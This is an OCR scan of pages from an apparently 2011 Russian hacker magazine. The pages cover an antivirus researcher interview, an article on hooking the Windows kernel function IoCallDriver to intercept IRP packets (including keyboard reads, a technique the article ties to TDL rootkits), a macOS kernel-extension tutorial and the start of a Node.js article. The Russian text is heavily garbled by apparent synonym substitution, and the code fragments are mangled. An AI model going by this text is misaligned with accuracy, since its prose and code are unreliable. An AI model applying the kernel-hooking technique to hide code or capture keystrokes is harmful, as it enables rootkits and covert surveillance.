ЦИ И МЕЖДУ ЭТИ М И ЗАДАЧАМ И?

задания. Или а сим в летнее время был случай, эпизодически

ведь наш брат их отнюдь не заимствуем, приблизительно что наш брат свои-то малограмотный

допустимый соискатель целую н еделю решал

успеваем воплощать в жизнь равным образом чужие нам ни ко чему. д

lrW

Пожал уй, диаграмм у Ган тая чертить безвыгодный

об дин коварный поверхность быть помощи со общества

видишь славянизм наших идей ваш покорнейший слуга вроде единожды

wasm . г u . Что касается пр оверокна аффилирован­

толково наблюдаю, но, знаете, далеко не художественно а

При ходит ся выслеживать компромиссы, где-то по образу не без;

ность вместе с кибекриминальным миром, ведь они,

пок аза ывать пальцем получай других . На антивирусном

карьеройресечерамнесовсемзавязыватьне

безусловно, есть, хотя распахивать их существо мы отнюдь не буду.

~ буду, же во общих чертах постараюсь откликнуться .

хочет ся, так командой обслуживать когда-то н адо.
Позт в отношении муукаждойгр у ппыаналитиковнара зных
исследовательских направленияхестьответ­

r.t

ЕСТЬ ЛИ ВООБЩЕУТВОЕГО ОТДЕЛА

0.;.1 ПОТРЕБНОСТЬ В НОВЫХ КАДРАХ?

ихразвити~послечегоонужетранслируетболее

УЧИТЫВАЯ И ДЕМОГРАФИЧЕСКИЙ СПАД В
РФ, И ПРОБЛЕМЫ РОССИЙСКОГО ОБРАЗОВА­

формальнуюпостановкузадачи непо средстве нно

НИЯ, НАСКОЛЬКО ВАМ УДАЕТСЯ ЗАКРЫВАТЬ

получи а налитиков . В одном изо направлений ми

ВСЕЖЕЛАЕМЫЕ ПОЗИЦИИ?

ст на е нный личность , со которым моя персона согласуюза дачи равно

нужно иметь роли аналитика из общим
руководством лабораторией. Покаэтотметод

lrW

Потр еб же сть открытым текстом есть, этак на правах

компромиссов работает хорошо, сточки зрения

~ интересных задач в меньшей степени малограмотный становится, а

процентнаго соотно ш ения общего времени

численность рук является касательно граниченным множеством .

занятости, наверное, п олучается
управления равным образом

07% на пользу

03%в пользу ресеча . Совмещать зто,

Квалифицированные специалисты на нашей
области -это вернее призвание, нежели профессия,

конечно, безграмотный просто, равным образом от случая к случаю рядом ходится неде лями

а напряженка увлеченных людей во этой предметной

появлять ся у себя до сле десяти вечера. Хорошо, ась?

области от каждым годом ощущается во се чище да

близкиелюди относятся кэтому не без; пониманием равным образом

сильнее . У нас беспрестанно открыт подборка возьми

всяч ески поддерживаютмою тяготение ко ис от ледова­

исследовательские по части зиции на правах во России, этак да

тельской деятельности.

ради рубежом

lwww.joineset.com). Причем питаться сделано

большое сумма примеров, при случае н аши

r.t

КАКИЕ ФОРУМЫ , БЛОГИ И РЕСУРСЫ

0.;.1 ТЫ САМ ЕЖЕДНЕВНО МОНИТОРИШЬ?
ПОСОВЕТУЙ ЛУЧШИЕ РЕСУРСЫ, ЧТОБЫ
БЫТЬ В ТРЕН ДЕ ПОСЛЕДНИХ НОВОСТЕЙ В
ОБЛАСТИ МАЛ ВАРИ.

соотечественники выбирают работу из-за предела­
ми РФ равно наша шарага многоразлично правая рука огаете
переездом.

r.t

КАКИЕ ГЛАВНЫЕ РЕЗУЛЬТАТЫ

0.;.1 РАБОТЫТВОЕГО ОТ ДЕЛА ЗА ПОСЛЕД­

lrW

Если ваша милость хотите являться на тренде последних

НИЙ ГОД, ЧЕМ ТЫ ЛИЧНО ГОРДИШЬСЯ ?

~ событий бери антивирусном поприще, то,
наверное, стои т подписаться возьми блоги всех

lrW

Наверное, центральный гордостьюявляется

антивирусныхкомпаний,таккакпериодическиу

~ результатнашей исследовательской работы

многих можетчто-то интересное проскочить, равным образом

"Stuxnet Undeгthe Micгoscope··. Наша команда

вернее сие просматривать на первоисточнике, а отнюдь не во

первой выпустила систематичный экспозе в области зтой

новостны х выжимка х. Много интересного не грех

угрозе из подробным анализом вредоносных

сыскать втвиттере, если бы подписаться возьми известных

модулей данного червя . После сего автор сих строк получали

западных исследователей. Причем не грех довольно

благодарности с различных компаний равным образом

неграмотный только лишь найти, да да обговорить не без; ними найденн ую

гасорганов на процесс нескольких месяцев. Также

тему. Если вас хотите взяться во курсе мировых

нашауниверсальная обслуживающая программа к кримина­

тенденцийпообратномуанализ~тооднозначно

листическогоанализа скр ытой файловой от истем ы

стоит только подпи са ться в гeddit из фидом Re veгse

семейств руткитов TDL3/3+/4, которая гораздо

Engine e г ing l www.гeddit.com/г/

ускоряетвремяизвлечения скрыто го контейнера,

Reveгse EnQ inee г i nQ ).

былаоченьтепло встреченазападными
правоохранительными органами.

r.t

РАССКАЖИ О КАДРОВЫХ ВОПРОСАХ .

0.;.1 КАКПРОИСХОДИТОТБОРКАНДИДА­

r.t

КАК ЧУВСТВ У ЕТСЯ КОНКУРЕНЦИЯ С

ТОВ В ТВОЙ ОТДЕЛ, КАКИЕ ПРИМЕРНО

0.;.1 ДРУ ГИМИ УЧАСТНИКАМИ РЫНКА?

ДАЮТСЯ ТЕС Т ОВЫЕ ЗАДАЧИ. ИССЛЕДУЕТЕ

ЗАИМСТВУЕТЕЛИ ДРУГУ ДРУГА ИДЕИ ,

ХАКЕР

00/153/2011

рынке оченьжесткая ко н курен ция , соответственно этому

сот рудничество равно совместные проекты после этого

аспидски редко когда встречаются . ::I:

КОДИНГ

АлександРЭккерт

lstannic.manragmail.coml

Универ сальныи
"-"

ильтр

НЕСТАНДАРТНЫЙ
СПОСОБ ПЕРЕХВАТА
IRP-ПAKETOB
В этой статье ты да я рассмотрим, как, имея

мелкий опыт, выдрессироваться положительно от
полпинка , только совершеннонестандартно

характеризовать фильтры уровня ядра.

На дискеты найдешь
рабочи й код, реали­
зующий перехват
loCaiiDriver, поль­
зуйся , только во благи х
целях!

Кстати, имей во на равным образом ду,
ась? совершенно новомодные

руткиты/буткиты
семейства как

TDLЗ 041, равно как прави­
ло, пере х ватывают

loCaiiDriver, чтобы

Разработаем свежий методзаставить

того в надежде умалчивать

систему коптеть бери себя.

системе .

свое наличность на

ильтровать дозволяется nрактически который угодно: ход для файлам,
загрузку библиотек равным образом отправление пр оцессов, отправку равно п рием дан­
ных п что касается Сети, во конце ко нц ов, притискивание клави ш в клавиатуре
равно перестановка мыши. Все сии поступки осуществляются несколькими
способами . Как правил о, кабы выговор ну аюшки? ж по отношению пользовательских компо­

нентах, так банальным перехватом нужных функций. Е сли а нужно

перехватитьданные во ядре, ведь у Micгosoft"a существуе т вместе с п ециальная

конце пц ия фильтров да мини-фильтров !более в области др об н насчёт об этом не запрещается

-

почит ать в MSDN: http :Ugoo.gl/ kPt8b , ht t p:Ugoo.gl/i gDObl . К примеру,
воеже надзирать из-за с nравляемыми на Сеть запросами п ользователь­

ских приложений, дано встречается на каждом шагу вариантТDI-фильтра,
тот или иной присоединяется во тенетный стек. Или но снедать манера соз дания
NDIS-IM-дpaйвepa, каковой в свою очередь является своеоб разным сетев ым
фильтром. В общем, возможностей аспидски много, а вотспособов их
реализации один раз маловато.

НОВЫЙ МЕХАНИЗМ
Как правило, процеживание происходит присутствие помощи прис ое динения

своего объекта - усик тр ойства для нужному стеку-сетевому, файловому равно
т. д. Более того, MicгosftWDM име н нотак равным образом реком едует посту пать-и на

результате всетак да место у пают: вызовы l oCгeate D ev i ce равным образом loAttachDevice

можноувидеть п очти на каждом фильтре, законном либо безвыгодный очень. Смысл
получи и распишись ходящегос ваш покорнейший слуга на стеке фильтра-это проп ускатьче рез себя IRР-пак еты,
п уте ш ествующие туда-сюда, для того п оиска да возможной сортировки, а
ино гда-и изменений, п еред а ваемы х во IRР-данных. Ничего вместе с л ожного

во этом нет, равным образом полезный программ ист, написав пару-тр ойкуфи льтров
равным образом ра зобрав ши не без; ь на жизненном цикле IRР-п акетов, начинает убежден хотя

перехватыватьданные, которые ваш покорнейший слуга др в отношении гоняетмежду дев айсам да . Что а
тутможноеще nридумать, не без; пр осиш ь ты. Един из твенное, почто общего позволено
получай йти кайфовый всех сих фильтрах-устройствах, сие извещение функции l oCaiiDгiveг.
Если кинуть взор на ортоскоп сверху эту фи нкцию, так целиком и полностью шиш при­

мечательного ты да я в дальнейшем безвыгодный уви квартал . Вс ё, ась? симпатия делает, сие отматывает плеть
наз а д равно вызываетmаjог-обработчика нижележащего удовольствие е р а, передав

е м ууказат ели в объек т-ус тр ойство равно обрабатываемый IRP-naк eт.

NTSTATUS
FASTCALL
IQgfCallDriver(_ __

ХАКЕР

00/153/2011

Универсальный фильтр

_I_NYDEVICE_OВJECT

Ключевым миг ом интересах филырации явля е т из моя особа парсинг не без; тр укту ­

DeviceOt)ject,
ры

IN OUT PIRP lr"R

_J ____________ --··--·--·

De vice Objec t. Пол у чив движок н а

нее, пишущий сии строки лег ко настил учи м указа­

т е ль в прин а дле жащий вместе с тр уктуре изобразитель драйвера- структуру

DRIVER _OBJECT. Можно такж е рассмотреть стек, гд е бы л п ой­
IRP, про этого, неравно помнишь, н ужно пробуждать IO_STACK_
LOCAТION *stack=IoGetCurrentirpStack Location(pirp). Далее в области

{

Irp->Currentlocation--;
irpSp=IoGetNextirpStackLocation( Irp );
Irp->Tail.Overlay.CurrentStackLocation=irpSp;

ман после х воп

указа т е лю получи и распишись не без; т ек твоя милость уж сможешь п роан ализир ова ть указате ль н а

_ _irpSp__:>Devicg_QbjeQ;_",_ oevi~;_g_Qbje~:!;; ·-------····-··--·--· ·····----- ---···-·
driverObject=DeviceObject->DriverObject;,_________
status=driverOt)ject->Major-Function[ir-p_.Sg->MajorFunction)( _ _
DeviceObject, Irp );
retu rn status;

<<oб ъeкт-фaйл >> -stack->FileObject. То естьтакими видишь н ех итрыми
д ейс твиями твоя милость сможешь определить, много равно кому пр е дн азначается
IRР - пак е т, ну-ка а зачем не без; ним положение т ь- д ело особенно твое. Так , например,

не запрещается наложить запрет проект каки х- либо файлов не без; носитель а. Не н ужак н в отношении число «пи» са ть
от ложны е фильтры файловой сис темы чтобы э тог о!
Достаточно захватить loC aiiDгiveг, образовать фильтрацию
IRР-пакетов от кодом

Кстати, loCaiiDгiveг-этo nсевдоним встречаемого во литературе

IRP_MJ_CREATE, соответственно указателю stack-> Fil eO bject

секс у чить кличка файла:

названия функции l ofCa iiDгi veг, которая, во свою очередь, общей сложности едва
является заглушкой пользу кого вам зо ва l op fCaiiDгiv e г. М ож только махом отметить,

зачем разве фильтроватьданные во ядре выш ео nисанным образом, так
всё, нежели б удовлетворительно е т себя откалывать такая фильтрация,- сие нераздельно п ерехват
loCaiiDгiveг. И вс ё! Н е довольно су щ yes твов ать на правах да х-то подозрительных устройств, прицепленны х во стек, безвыгодный если т п ерех ват ов mаjог ­
обрабо тчиков во системе. В сё, ч т по части м ож хотя достаточно отрыть , - сие изменен­

*fil eNameinformation=е;
status=ObQueryNameString( stack->FileObject,
fileNameinformation, 0е24, &retSize);
wcscat(fileNameinformatioll:)Name.Buffer,
_ _stack->FileObj_g_ct->FileName,_fuJffer); ___
ill;>gPrint("file name now is: %ws \!f, fileNameinfo cm_ation-"~Name.Buffer);
OВJECT_NAME_INFORMAТION

ный надсыл ф у нкции loCaiiDгiveг, а вотуж е определить, что-то не кто иной
фильтр условная единица т ся равным образом какие показатели ради хо дят че рез н у тро твоегонепростого

дра й фетишизм [если он, конечно, су щ yes тв ует отдельным файлом, н по отношению ась?

...п осле а завернутьэтотiRР-пакет, неравно он, доп усик тим , пр едназна­
чен в целях открытия того файла, котор ый т ебе н ужак однако ради щитить .

меш ет заразитьдругой парус ? ! , хорош адски да адски сложно.

Теперь самое альфа и омега равным образом от амо е со ло ж н ое. Пр осто й перехват IRР -паке та ,
основанный получи единственном хуке loCaiiDгi ve г, во нашей ситуации
никак не поможет, да видишь поч ему. Скажем , МJ-код

ULONG CreateDisposition=
_ (~tш;_k:? Pa c.<! meters .Crg_ate .OQ:!;_:!Qo.s» 04)_11! е,~хееееемt;
if((CreateDisgosition-=FILE CREATE) ll ____
(CreateDisposition==FILE_OPEN_IF )11
(CreateDisposition==FILE_OVERWRITE_IF))

IRP_ MJ _C REATE может

направляться подле создании файла сверху дис ке тож около соз дании сетевого
сое динения . Чтобы со свершать в некоторой степени плодотворно е, п олучив наблюдение надо

IRР-пакетом не без; таким кодом, твой программа-драйвер долж ен иметь отличительной чертой опреде­
ленной логикой, позволяющей определить, гораздо особенно равным образом со кой
целью посылается э оный IRР - п аке т, а вишь сие уж полно гем гомон рно,

Irp->IoStatus.Status=STATUS_ACCESS_DENIED;
Ir-Q->IoStatus .Information=€!;___________
IoComgleteReguest(Irp,JQ_МQ_INCREMENT); _ _ _ _ __
ExFreeP_ool(file]"!ameinf or-matioo);
return STATUS_ACCESS_DENIED;

только всё ж е по плечу . Вс ё дескать ло во томик , ась? nри п ерех вате loCaiiDгi veг
во наши щипанцы п опадает равно индикатор нате

DeviceObject, ра от способности сив какой ,
IRP. Воэьм ем

можнодостаточноточно определить, комупредназначается

сложности

явственный быть мер . При чтении сканкода клавиатуры по мнению вместе с те ку подклю­

В от пособе фильтрации IRР-данных , основанном нате п е ре х вате

ченны х <<ус тройств клавиатуры>> прогоняется IRР-пакет со кодом

IRP_ MJ_
READ. Мы п е ре х ватываем loCa i iDгive г, половая принадлежность уч а емуказа тель для IRР-пакет,
MajoгFunctioп которого равняетс ваш покорнейший слуга IRP_ MJ_ READ . Н насчёт наравне определить, зачем

l oCai iDгi ve г, убирать одн а серьез н ая со лож только от ть . Д ело во т ом, который loCa iiDгi veг

является чрезвычайн об используемой функцией на ядр е Windows"a. Это
связано из очевидным фактом -функция всего только да ситуация ет, который отправля­

этотnак ет то-то и есть с клавиатуры? Для этого, вроде ваш покорнейший слуга сделано говорил, нам нуж­

ет IRР-пакеты одесную -нале в , а на вслед за имодействие в лоне драйверами­

только проанализироватьтакже пере х ваченныйукаэатель бери

усище трой из твами во ядре осно ван что касается особенно бери п осылке IRР -пакетов. Правд а,

OeviceO bject. В

со лучае из клавиатурой сие дозволительно проделать следующим образом.

Так по образу устройств на стеке может взяться н yes колько , мо ж только [как вари­

возле обслуживании обложка что касается брань сис темы вот и все когда используется
конструкция

FastiO, только об этом сообразно зже. Е от ли представить, что такое? весь сия груда

ант! не мудрствуя лукаво читать наименование тех дра йверов, которые создали сии

драйверов начинаетслатьдр уг другу IRР -пакеты да да х обрабатывать, в таком случае

устройст во а:

мож н что касается л е гко перед ставит ь. какую нагрузку равным образом со пытыва ет loCaiiDгiveг­
peчь можетидти в рассуждении далеко не ско льки х со тня х ваша милость зо ва х на со екунду. П оэтомууста­

BOOLEAN IsKeybordDevice(

DEVICE_OВJECT

* topDevice )

новка/с нятие пере х ватка в lоСаiiDгi vе г-делотонко е равным образом свободно р у шащее
систему во обличие е

{
_uNico~_ :?IBIN§_ dr.ivecNaJne

DEVI~_OВJECT

* device

RtliпitUnicodeStriпg(

=@; ___________________________

=е; _ _ _ _ _ _ _ _ _ _ - - - - - & driverName, L"\\Driver\\Kbdclass" );

BSOD"a со адрес ом DRIVER_UNLOADED_WIТHOUT_CANCELLING_

PENDING_OPERAТIONS. Это проис ходит обычно, коли начинаешь возле
п е ре х вате неграмотный оченьаккуратно делать те документация , которые н есу т от

со битва IRР-пак е ты. Спеш у пр едостеречь: необ хо димым условием твоего
драйвера, тот или другой короче пере х ватывать loCaiiDгi ve г, должн а являться гра­

for (device=TopDevice;
device;
device=device->DeviceObjectExtension->AttachedTo)c___ _ __

__ _____

_ {

if (__!RtlComgarei,inicodeString(_
&device->DriverObject->DriverName, &driverName, TRUE))
return TRUE;

мотная отшлифовка равным образом после вершени е совершенно х ради от мотренны х IRР-пакетов .

ЗАКЛЮЧЕНИЕ
К ак оказывается, вместе с создавать универсальныйинестандартный фильтр
хватит легко. А буде достанет по отношению пыт а кодинга драйверов , так соз­
установленный фильтр будетобладать до этот поры равно в таком случае ликой н а -де ж ности. Возмож­
однако со тей применения у этой малограмотный х итрой те х ники весть много, а з атраты получи и распишись

реализацию минимальные- сие хо роший от тим ул на ра зви тия темы на

return FALSE;_

перед машни х побег ловиях. Удачного компилирования , равным образом д а преб удете тобой
Сила! :Х:

ХАКЕР

00/153/2011

099

КОДИНГ

Воля Захаров

[sevalavingrad .ru l

Ядром в области
Макинтошу
ИЗУЧАЕМ КЕRNЕL-КОДИНГ ПОД МАС OS Х
Разработка прикладных программ лещадь Мае
да

iOS релятивно

OS Х

что надо освещена на лите­

ратуре равным образом интернете . А в духе насчеттемы создания
кода, некоторый вынужден протекать во режиме

ядра? С этим- глухо. В этой статье наша сестра попробу­
ем данную неправота подрубить подо корень .

Я

POMACOSX

Для начала-немного теории, которая поможеттебе рядом создании рас­

ширений ядра. Мае ОSХоснована получай ядреХNU IXNU is поt UNIXI.XNU-этo
гибридное ядро, которое состоит с нескольки х компонентов : подсисте ­
автор

Mach, BSD равно объектно-ориентированногофреймворкадля создания
00 Kit .

драйверов

Масh-это микроядро, созданное на результате исследований во
университете Карнеги во середине 00-х годов. Микроядерная архитект у­
ра , во вкусе известно, непло хо смотрится на презентация х, а , для сожалению ,

приводит ко серьезным вопрос м из производительностью равно отладкой.

Видимо, следственно пp oeктGNU/HURD, во котором порядок
Сеть
Файловые

GNU п остроена отнюдь не

бери монолитном Liпu x, а нате микроя д ре, всегда до этих пор д а л ек с выпуска стабиль­
утнапиштим версии. Н ет-нет, малограмотный волнуйся, для Мае OSX пишущий сии строки подобное безвыгодный скажем, да

систе-мы

решительно никак не потому, почто боимся пуржить яблочных фанатое
Мае

OSX подсистема Mach используется

:1. Дело на том, сколько во

во изрядно измененном виде :

микроядро равным образом по сию пору компоненты, которые онодолжно обслуживать, соб раны
на едином адресном пространств е монолитного ядра. Такой ход, от одной

0/0Kit

сторо ны, позволяет вмещать побольше не без; труктурированное ядро, а из другой­
избавляетот nроблем из отладкой да nроизводительностью.

Масh-код во XNU отвечает вслед превалирующая низкоуровневых функций:

Драйверы

ХNUвнутри

000



вытесняющая многозадачность;
виртуальнаяпамят~

межпроцессноевзаимодействи~

ХАКЕР

00 /153/201 0

Ядром до Макинтошу

()00

SampleKext

что до

(о_. String Matehing

lnfo

дctl on

Croups & Files

J

Starch

!1 SampleKext

""\. Code

об

А

е
по части

• Ci;;l source

Resources

по отношению

!Е) SampleKext.c

ео об

на

Products
._ @) тargets

по части

liJo

., ~

Executo:aЫes

Errors and Warnings

т

Find Results

• IJ!I вookmilrks

0> t;l SCM

...

kern_return_t.

0

Project Symbols
· ~ lmplemtnt01tl on Flles
NIB FHes

Soмp let:::ext _s tort

prlntf ( "KEXТ

(k.IIOd_lnfo_t

* ki ,

* d)

voi d

{

loade<lln" ) ;

return KERN_SI.CCESS ;

kern_return_t

$c:8c) leКext_s top

(1<.1100_\nfo_t

prtntf C KEXT ~.nlooded\n " ) ;

return

* ki,

vo id

* d)

{

KERН_SIXCE SS j

е Succeed~ ,а

0utld SUCCttdtd

0ulld SUCCttdtd
kехtудачно собрался

nрерывания;

по образу присущий , нуждаться использоватьдве машины: получи и распишись одной работа­

консольный ввод-вывод.

ет ядро, а сверху видоизмененный - отладчик. Для отла д ки используется GDB. Когда

kext отлажен, его не грех губы навливать на систему. Тогда из-за следовать гру зку
П одсистема В 00 ядра Мае 05Хоснована получи коде с FгeeB5D да отвеча-

расширения подле запуске сис темы короче давать ответ kext-manageг. Для

сего бандл kext"a нужно уложить на /5ystem/ Libгaг y/ E xtensions.

ет вслед за совершение следующих задач:

При соз дании kext"oв [как да остального со фта] на Мае 05Х используется

идентификацию пользователя да базовую форма безопасности;

P051 XAPI, системные вызовы В 00;
TCP/ IP В50-сокеты;

XCode . Поnробуем сотворить nростое расширениеядра со через этой IDE.
Для сего нам нужно:

файловые сис темы;
непохожие аппаратура синхронизации ;

поддержку реального времени.

Для взаимодействия от оборудованием во ядре Мае 05 Х прим еняется
вещь но- орие нтированный фреймворк

0. ЗапуститьХСо dе :].
0. Создать свежеиспеченный nроект да сре ди шабл оно на наметить Generic Keгnel
Extension, ввиду наш брат будем созидать пр остое рост бери С,
а безграмотный 00 К it -драйвер в С++.
0. В качестве имени проекта указать5аmрlеКехt [да, пишущий эти строки настаиваю :11.

00 Kit . Он равным образом не без; пользуетограни­

ченное множество С++ на качестве языка программирования . В нем,

Если твоя милость по чести реализовал нижеописанный сверх простодырый

например, отсутствуюттакие слои , что исключения, множествен­

ал г орит м, так на качестве его логичногозавершен да пишущий эти строки концепция соз даст

ное наследование, шаблоны равно RПI. Каждый молодчик сервиса ядра либо

вслед за нас обложка 0ampleKext.c. В нем будут со хранить ся двум функции :

устройства пр едста вл ен во 00 Kit во виде класса С++ , а отдельный чёткий

0ampleKext_staгt равным образом 0ampleKext_ stop . Как твоя милость уж догадался , сии функ­

услуги не ведь — не то устройс тво-в виде объекта сего класса. Короче говоря ,

ции вызываются подле загрузке/выгру з ке расширения . В шаблоне сии

парус

функции шиш полезног относительно н е -де лают, а во реальном kext"e они отвечают

00 Кit-это объект, какой-никакой управляетустройством либо шиной ,

nредставляя философический интерфейс для ним про других частей системы.
New Project

MO,lJ,YЛИЯ,lJ,PA
Мае 05 Х предо ста вля ет вот змож ность дополнять сердечник вместе с nомощью

Choose

динамической загрузки модулей ядра, которые называют kехt"ами [от

~

keгnel extensionl . Е сли твоя милость безвыгодный собираешься руководить исходники XNU,

template for your new project:

Mac.OSX

Applic.1tion

так единственная возм ожность привести в исполнение адрес на режиме ядра - сие

Audio Unlts
Autom;~tor Actlon

царапание равно заваливание расширения. Так, драйвера IOKit реализованы

Generic Kernel

вот поэтому и есть на виде kext"oв. Кехt"ы -это бандлы, на правах да обычные пользова­

"

j.1Vi1

висимости модуля;

бинарные файлы модуля ядра-файлы на Ма сh-0-фо рмат е, во которых
содержится код, nодгружаемый во адресное место ядра;

Standard Apple Plug-ins
St01tic Libr.1 ry

Other

ресурсы- иконки, показатели пользу кого локализации да т.п.

Когда

IOKitDriver

Extenslon

Bundle
Command Llne Utility
Dynamic Llbrilry
Framework

тельские приложения Мае 05 Х, равным образом они содержат:
plist-фaйл , на кото пунш описано содерж имое бандла, установки равно за­

а

kex t соз д ан, занять его на главное позволительно от через команды

kextload изо терминала . При этом никуда не денешься располагать пр ава администра­

Тhis

project builds

а

kernel extenslon.

J

в таком случае ра . Отлаживать kext " ы со ложнее пользовательских приложений. В

первую очередь, нужно позволить отладку ядра . Для отладки ядра,

ХАКЕР

00 /153/20 01

Выбирае м маска с целью nроекта

001

КОДИНГ

users -mac-pro:Debug user$ sudo ер -R SampleKext.kext /tmp
users-mac-pro:Debug user$ sudo kextload /tmp/SampleKext.kext
kextload: /tmp/SampleKext.kext loaded successfully
users -mac -pro:Debug user$ sudo kextunload /tmp/SampleKext . kext
kextunload: unload kext /tmp/SampleKext.kext succeeded
users-mac-pro : Debug user$ tail -5 /var/log/system.log
Jul 0 00:10:27 users-mac-pro sudo[309]:
user : TTY=ttys001 ; PWD=/Users/user/Documents/Sampl
eKext/build/Debug ; USER=root ; COHNAND=/Ьin/cp -R SampleKext . kext /tmp
Jul 0 00:10:45 users-mac-pro sudo[310]:
user : TTY=ttys001 ; PWD=/Users/user/Documents/Sampl
eKext/build/Debug ; USER=root ; COM~~ND=/sbin/kextload /tmp/SampleKext . kext
Jul 0 00:10:45 users -mac-pro kernel[O]: КЕХТ loaded
Jul 0 00:10:52 users-mac -pro sudo[311):
user : TTY=ttysOOl ; PWD=/Users/user/Documents/Sampl
eKext/bu ild/Debug ; USER=root ; CO~~ND=/sbin/kextunload /tmp/SampleKext.kext
Jul 0 00:10:52 users-mac-pro kernel[O]: КЕХТ unloaded
users-mac-pro:Debug user$

Подгружаем kехtдля тестирования

после регистрацию callback"oв интересах различных событий ядра да часть

CFBundleVersion-вepcия бандла .

действияпоинициализации/деинициализациирас шир ения. Напри ­

OSBundleLibraries- либы, ото которых зависит kext.•

мер, на SampleKext_staгt автор могли бы зарегистрироватьсокет, посредством

IOКitPersonalities-oбъeкты

каковой прикладные программы могли бы иметь контакты со нашим kext"oм.

настоящий kext. Если сие драйвер, естественно .

00 Kit, пользу кого котофей орых нужно подгружать

Но про основания пишущий сии строки во сих функцияхтолько выведем тестовые сообще­

ния, которые не возбраняется если т различить подле следовать гр узке/выгрузке расширения.

Поскольку наша сестра создаем невыгодный драйвер, а обычное распространение
ядра, для того корректной загрузки kехt "ад остаточно склифосовский поломать

S.i!J!Iple~e.J!t&

______________________________________. ___ _

ltiш;JyJ!e_.S~Y-~L.sYs:tm, b~ .---·-···--

_____________ . __ _____ _ ______ _

#include_<:mach/mach _types , _h>
kern_return_t MyKext_start (kmod_info_t
{
printf( "Ke.J!1:_lgaded. \ n" );

--

Лt!J.rд.J5IBN_SJ,!CCISS; ____

OSBundlelibгaгies. Для того так чтобы автоматом извлечь роспись всех ком­
понентов, ото которыхзависит расширение, не возбраняется использоватьутилиту

kextlibs. Запустив ее вместе с ключом -xml, твоя милость приёмом получишьХМ L-к од, что

* ki,

void

* d)

- - - - ····-------- ----·-- ·- --·--

}
kern_return_t MyKext_stop (kmod_info_t

* ki,

void

* d)

нужнодобавить на plist-фaйл:

kextlibs -xml M}"Kext.!g!JIL
0.!se}"2QSBundleLibrarie.sill.e}"_>_. ___________. ___.................._____ _
~Qict >

·-·-----·-

~ey>com . ;эpp1e •.kpJ,Jj.JJ_kern</keY2

<string>9. 0. 0</string>
</dict>

printf( " Kext unloaded.\ n" );
return KERN_SUCCESS;

Сборкапроектапослеэтогопройдетбезпроблем,ноеслитыпопро­
буешьзагрузитьSаmрlеКехt . kехt, в таком случае шиш хорошего неграмотный получится,

Наш kext зависит итого отодно го элемента. Скопируем данный адрес на
lnfo.plist. Для того с целью выше- kext заработал, остался сам за себе видный шаг:
бандл kext"a вынужден состоять адми ни стратору. Для тестирования
скопируем его на /tmp справами рута:

поелику пишущий сии строки единаче безвыгодный позаботилисьо содержимом plist-фaйлa. Каждый

kext всенепременно вынужден охватывать lnfo.plist во ХМ L-ф ормате .

Посмотрим

sudo ер -R SampleKext.kext /tmp

важныедля правильной загрузки расширения ключи во этом файле:

CFBundleldentifier- идентификатор kext"a. Например, com.apple .

Воттеперь можнозагружать свой модуль:

dгiveг. AppleUSBMeгgeNub.
СFВuпdlеЕхесutаЫе-бинарный обложка

случае

kext"a.

Его может равно безвыгодный существовать во

sudo kextlpaJJ..Lt.rnp/SampleKex t....kei<.:t.________________________________..

00 Кit-драйверов.
После зто го на /vaг/log/system.log твоя милость можешь изведать выход нашего

kext "a . Чтобы выгрузить kext, используем kextunload: sudo kextunload 0
tmp/SampleKext.kext.

ДЛЯКОРРЕКТНОЙЗАГРУЗКИ
КЕХТ•А ДОСТАТОЧНО

Мы создали токсоплазма модульядрадля Мае

OSX. Все, аюшки? спирт умеет

нате сегодня, - сие корректным образом загружаться да выгружаться. В
идеале но модули ядра могут прилагаться отнюдь не лишь только для того создания

БУДЕТ ПОПРАВИТЬ

драйверов, только и, например, ради вынесения нередко используемой мно­

OSBUNDLELIBRARIES

Удачно го kегnеl-кодингаl :Х:

002

гими прикладными программами функциональности во услуги ядра.

ХАКЕР

00/153/ 0011

Сергуся Конаненка lkononenchegГclgmail.co ml

ПИШЕМ СЕРВЕР
МГНОВЕННЫХ

СООБЩЕНИЙ

HANODE.JS
Все знают, зачем такое
JavaScгipt. Но немножко кто такой
может нарисовать его

обрабатывающим далеко не подтекстовка
на дивах да спанах, а тысячи

равно тысячи входящих запро­

сов. Мы теперь безграмотный токмо
представим, хотя равным образом разрабо-

таем держи

nodejs.oгq -caйт
nроекта,здесьже
материал равным образом
nримеры.

JS собственный

сервер!

Масштабируемость­
сие расслабленный воnрос
чтобы Node.js.
Основная nроблема­
сольватация
междуnроцессами.

Но кушать изящное
расшивка от nомощью

рuЫish/suЬsсгiЬе­
вэаимодействия,
использующего базу
данных Redis. Воз­
можно, наша сестра об этом до сей времени
наnишем .

ХАКЕР

00/153/2011

JavaScri pt с целью сервера

ЧТО ТАКОЕ

NODE.JS

Раньш е чтобы создания ка со тамного вместе с ервера н е обходимо было припожить

мало ли усилий , а процесс асин х ронной моде лиуправления вводом
да выводом впредь до не без; тавляла изрядно проблем . Даже Pythoп не без; Twisted вместе с пасал
неярко . Однако из появлени е м Node.jsзaдaчa н е вероятноупростилась.
Если баять википедийно, так Node .j s -этo событийно ­

ориентированная

0/0 серверная мир с целью JavaScгipt . А приближённо говоря,

со пециальный JаvаS из гiрt - фр е ймворк, по мнению з воляющий д е лать вещи, во
общем , для того аз многогрешный ва не без; часовня безграмотный х арактерны е, чаятельно работы не без; файловой

0 О OJ_ otf
~

GoosJie Ubr•rles

АР

Х ~О: ВООО

c:J Socl•l IIJ: Отlср~о~т н;tбор н• "")"

Х , -Е) Google Docs - Hom Х

~~ ХАКЕР - node.js - С.

xj

х ~

"" LONG POLLING

- - - - - - - - -~...;
to(:[l!
.o.l Cl
D Research CJ Docs CJ Work CJ News CJ Other

l!fJ

$

Сообщсtmс д11JI всех! Сообщение ДJ1JI всех! Сообщсtmе ДJ1JI всех! Сообщс1оtс д11JI вссх! Сообще1оtе д11JI вссх!
CooбщcJrnc с целью всех! Сообщсtmс дпя всех! Сообщсtоtс дп.я всех! Сообщснисдпя всех ! Сообщение дlUIВCCXI
Сообщсtоtс д.ля всех! Сообщсt оtс ради всех! Сообщсtmс дпя всех! С ообщсtmс д11Я оссх! СообщсJmе д.пя всех!
Сообще1оtе д.пя всех! СообщсJоtс дп.явссх! Сообщеtmе интересах всех! С ообщс.tоtс интересах ВCCJt! Сообщеtоtс дпя всех!

С ообщешtе АЛЯ всех! Сообщсшtс в целях всех! CooбЩCJDte интересах вссх! С ообщение A11J1 всех! Сообщсюtе д11Я .всех!
Сообщеtmе АЛЯ всех! Сообщсшtе ц,:tя всех! Сообщение дпя всех! С ообщсtwс .Q1I.R всех! Сообщсtоtе ддявссх!
